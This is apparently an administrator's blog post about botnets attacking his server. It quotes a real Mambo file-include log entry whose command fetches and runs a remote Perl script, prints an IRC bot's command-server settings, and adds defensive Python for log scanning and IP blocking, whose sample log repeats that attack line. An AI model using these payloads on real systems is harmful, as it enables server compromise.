Botnets

I really want to do something when I discover a botnet that has been trying to exploit some website on the server I administer. There are a few signatures that can easily be recognised as an attempted attack. One that I see often tries to exploit a Mambo bug that is more than one year old. This is such a log entry:

255.255.255.256 - - [19/Dec/2006:00:57:53 +0100] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://xargonu.evonet.ro/tool25.txt?&cmd=curl%20-o%20/tmp/unix%20http://rebegea.xhost.ro/php/scan.pl;perl%20/tmp/unix? HTTP/1.0" 200 9905 "-" "Mozilla/5.0"

As you can see I obfuscated the source IP. I downloaded the file referenced in the URL. At the top of that script you see this piece of code:

my @adms=("sclipici");	       #
#----------------------------------------------################################################
my @canais=("#sclipici :lametrapchan","#sclipici :lametrapchan");     #
#----------------------------------------------################################################

my $nick='necazu';	                       #
#----------------------------------------------################################################
my $ircname = 'id';                         #
#----------------------------------------------################################################
chop (my $realname = `uname -a`);                   #
#----------------------------------------------################################################
$servidor='217.107.222.15' 		       #
unless $servidor;  			       #
#----------------------------------------------################################################
my $porta='6667';

As you can see it's not so hard to find the IRC server the exploited servers connect back to, and the commands that are given. Here the IRC server has the IP 217.107.222.15 and port 6667. The right thing to do now would be to warn the abuse contact for that IP. I tried that for some time, but after a while you give up because you never get any response.
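The two checks walked through above, spotting the Mambo include probe in the access log and reading the IRC server, port, nick and channel list out of the dropped Perl script, as an added example. This is not the author's tooling, and everything in it is constructed: the log lines, the bot fragment, and the .example hostnames and documentation-range addresses that stand in for the real ones quoted above.

```python
"""Spot remote-file-include (RFI) probes like the Mambo one above in an Apache
combined log, and pull the IRC rendezvous out of the dropped Perl bot.

Added example for this post, not the author's own script.  Log lines, Perl
fragment, hostnames and addresses below are constructed.
"""
import re
from urllib.parse import unquote

# Apache "combined" format: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# Query keys the Mambo/Joomla mosConfig_absolute_path include was abused through.
INCLUDE_PARAMS = ("mosConfig_absolute_path", "GLOBALS[mosConfig_absolute_path]")
URL_RE = re.compile(r"(?:https?|ftp)://[^\s;'\"]+", re.I)


def parse_line(line):
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def query_params(target):
    """Split the query string on '&' only.  Done by hand because the cmd=
    payload carries a literal ';', which older parse_qsl also splits on."""
    params = []
    for piece in target.partition("?")[2].split("&"):
        key, _, value = piece.partition("=")
        params.append((unquote(key), unquote(value)))
    return params


def find_rfi(entry):
    """Return (include_url, cmd) when an include parameter carries a URL.
    A local path in the same parameter is a different probe; not flagged."""
    params = query_params(entry["target"])
    for key, value in params:
        if key in INCLUDE_PARAMS and URL_RE.match(value):
            # The scanner puts a '?' after the include URL so that whatever the
            # vulnerable include() appends becomes a query string for the
            # attacker's server; strip it, and the stray '?' on cmd as well.
            cmd = next((v for k, v in params if k == "cmd"), None)
            return value.rstrip("?"), (cmd.rstrip("?") if cmd else None)
    return None


def scan_log(text):
    """One dict per RFI hit: source host, include URL, command, drop URLs."""
    hits = []
    for line in text.splitlines():
        entry = parse_line(line)
        rfi = find_rfi(entry) if entry else None
        if rfi:
            include_url, cmd = rfi
            hits.append({"source": entry["host"], "include_url": include_url,
                         "cmd": cmd,
                         # second-stage downloads named in the command payload
                         "drop_urls": URL_RE.findall(cmd or "")})
    return hits


# Settings the bot keeps at the top of its source (names as in the excerpt).
PERL_C2 = {
    "server": re.compile(r"\$servidor\s*=\s*'([^']+)'"),
    "port": re.compile(r"\$porta\s*=\s*'(\d+)'"),
    "nick": re.compile(r"\$nick\s*=\s*'([^']+)'"),
    "channels": re.compile(r"@canais\s*=\s*\((.*?)\)\s*;"),
}


def bot_rendezvous(perl_source):
    """IRC server, port, nick and channel list from the bot's source text."""
    info = {name: m.group(1) for name, rx in PERL_C2.items()
            if (m := rx.search(perl_source))}
    if "channels" in info:  # entries are '#channel :key'; the list repeats itself
        info["channels"] = sorted(set(re.findall(r'"([^"]+)"', info["channels"])))
    return info


# --- constructed sample data, not from the post ------------------------------
SAMPLE_LOG = """\
203.0.113.7 - - [19/Dec/2006:00:57:53 +0100] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://drop.example/tool25.txt?&cmd=curl%20-o%20/tmp/unix%20http://drop.example/php/scan.pl;perl%20/tmp/unix? HTTP/1.0" 200 9905 "-" "Mozilla/5.0"
198.51.100.4 - - [19/Dec/2006:01:02:10 +0100] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [19/Dec/2006:01:05:44 +0100] "GET /index.php?mosConfig_absolute_path=/etc/passwd HTTP/1.0" 200 9905 "-" "Mozilla/5.0"
"""
SAMPLE_BOT = r"""
my @adms=("admin");
my @canais=("#example :key","#example :key");
my $nick='bot';
$servidor='192.0.2.15'
unless $servidor;
my $porta='6667';
"""
```

Running `scan_log(SAMPLE_LOG)` flags only the first line (the third passes a local path, not a URL) and lists `http://drop.example/php/scan.pl` as the second-stage download; `bot_rendezvous(SAMPLE_BOT)` gives the server, port, nick and the de-duplicated channel list, which is what goes in the abuse report.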

The IRC server found in this script isn't active any more at the moment. But from another access log entry I got this script. You can extract the IP and port 84.232.78.6:6667 from the script. They expect you to go to the channel #necazul with the nick gabiXXX, with XXX some number.

Just drop by some time; I don't think they like it, and if enough people do this they will have to move. If someone knows where you can report this stuff without wasting your time because no one will do anything about it, please let me know.

The webserver I administer has been under some sort of DDoS attack for some weeks now. At first I noticed something was wrong because the server ran out of workers although the bandwidth and the number of requests per second were normal. After some time I discovered that some hosts tried to post to an old phpBB2 forum I had removed a few weeks before. I've been running a script for two weeks that parses the Apache extended server status and checks whether some host is posting to that URL. The rate isn't high, but they don't read the response and keep the TCP connection open, so the connection has to time out.
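An added example of the status-parsing check described above. It is not the author's script, which is not on the page; it assumes mod_status with ExtendedStatus On and parses the worker table that page serves. The status page in the block is a constructed sample in that table's layout with documentation-range addresses, and the phpBB2 posting path is assumed.

```python
"""Find clients that tie up Apache workers with requests to one URL, by
parsing the worker table of mod_status's extended status page.

Added example, not the post author's script.  SAMPLE_STATUS is a constructed
page in the mod_status layout (columns Srv PID Acc M CPU SS Req Conn Child
Slot Client VHost Request); addresses are from documentation ranges.
"""
from collections import Counter
from html.parser import HTMLParser

COLUMNS = ("srv", "pid", "acc", "mode", "cpu", "ss", "req",
           "conn", "child", "slot", "client", "vhost", "request")


class StatusTable(HTMLParser):
    """Collect the <td> cells of every <tr>; the header row uses <th>, so it
    comes out empty and is dropped."""

    def __init__(self):
        super().__init__()
        self.rows, self._row, self._cell = [], None, None

    def handle_starttag(self, tag, attrs):
        if tag == "tr":
            self._row = []
        elif tag == "td" and self._row is not None:
            self._cell = []

    def handle_data(self, data):
        if self._cell is not None:
            self._cell.append(data)

    def handle_endtag(self, tag):
        if tag == "td" and self._cell is not None:
            self._row.append("".join(self._cell).strip())
            self._cell = None
        elif tag == "tr" and self._row is not None:
            if self._row:
                self.rows.append(self._row)
            self._row = None


def workers(status_html):
    """One dict per worker slot in the extended status table."""
    p = StatusTable()
    p.feed(status_html)
    return [dict(zip(COLUMNS, row)) for row in p.rows if len(row) == len(COLUMNS)]


def hogging_clients(status_html, target_path, min_workers=2, min_seconds=0):
    """Clients holding at least min_workers busy slots (W sending reply,
    K keep-alive, R reading) whose request hit target_path and has been
    open for at least min_seconds (the SS column).  Idle slots ('_') and
    requests for other paths are ignored; the query string is dropped."""
    hits = Counter()
    for w in workers(status_html):
        parts = w["request"].split()
        if len(parts) < 2 or w["mode"] not in ("W", "K", "R"):
            continue
        path = parts[1].split("?", 1)[0]
        if path == target_path and int(w["ss"]) >= min_seconds:
            hits[w["client"]] += 1
    return {c: n for c, n in hits.items() if n >= min_workers}


def block_rules(clients, port=80):
    """iptables commands dropping the offenders' TCP connections to the web
    port, returned as strings so they can be reviewed before being run."""
    return ["iptables -I INPUT -s %s -p tcp --dport %d -j DROP" % (c, port)
            for c in sorted(clients)]


# --- constructed sample status page, not a capture from the post's server ----
SAMPLE_STATUS = """<html><body><table border="0">
<tr><th>Srv</th><th>PID</th><th>Acc</th><th>M</th><th>CPU</th><th>SS</th><th>Req</th><th>Conn</th><th>Child</th><th>Slot</th><th>Client</th><th>VHost</th><th>Request</th></tr>
<tr><td><b>0-0</b></td><td>4101</td><td>0/3/120</td><td><b>W</b></td><td>0.02</td><td>41</td><td>0</td><td>0.0</td><td>0.01</td><td>0.40</td><td>203.0.113.5</td><td nowrap>www.example.org</td><td nowrap>POST /phpBB2/posting.php HTTP/1.1</td></tr>
<tr><td><b>1-0</b></td><td>4102</td><td>0/1/98</td><td><b>W</b></td><td>0.01</td><td>39</td><td>0</td><td>0.0</td><td>0.00</td><td>0.33</td><td>203.0.113.5</td><td nowrap>www.example.org</td><td nowrap>POST /phpBB2/posting.php?mode=reply HTTP/1.1</td></tr>
<tr><td><b>2-0</b></td><td>4103</td><td>0/7/77</td><td><b>_</b></td><td>0.05</td><td>3</td><td>2</td><td>1.2</td><td>0.02</td><td>0.51</td><td>198.51.100.4</td><td nowrap>www.example.org</td><td nowrap>GET /index.php HTTP/1.1</td></tr>
<tr><td><b>3-0</b></td><td>4104</td><td>0/2/64</td><td><b>W</b></td><td>0.01</td><td>40</td><td>0</td><td>0.0</td><td>0.00</td><td>0.20</td><td>203.0.113.6</td><td nowrap>www.example.org</td><td nowrap>POST /phpBB2/posting.php HTTP/1.1</td></tr>
<tr><td><b>4-0</b></td><td>4105</td><td>0/1/10</td><td><b>K</b></td><td>0.00</td><td>5</td><td>0</td><td>0.0</td><td>0.00</td><td>0.01</td><td>198.51.100.9</td><td nowrap>www.example.org</td><td nowrap>GET /images/logo.png HTTP/1.1</td></tr>
</table></body></html>
"""
```

Polled every minute against `http://localhost/server-status`, `hogging_clients(page, "/phpBB2/posting.php")` returns the hosts holding two or more workers on the removed forum URL; raising `min_seconds` to something near your Timeout picks out only the connections that are being left to time out. Feed the result to `block_rules` and review the commands before applying them, and keep the blocked list so the same hosts are not counted again.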

At the moment I'm already blocking over 1150 IPs and they keep trying. I've also put the list of blocked IPs online; maybe someone can do something useful with it: http://web.ulyssis.org/blocked-ip.txt
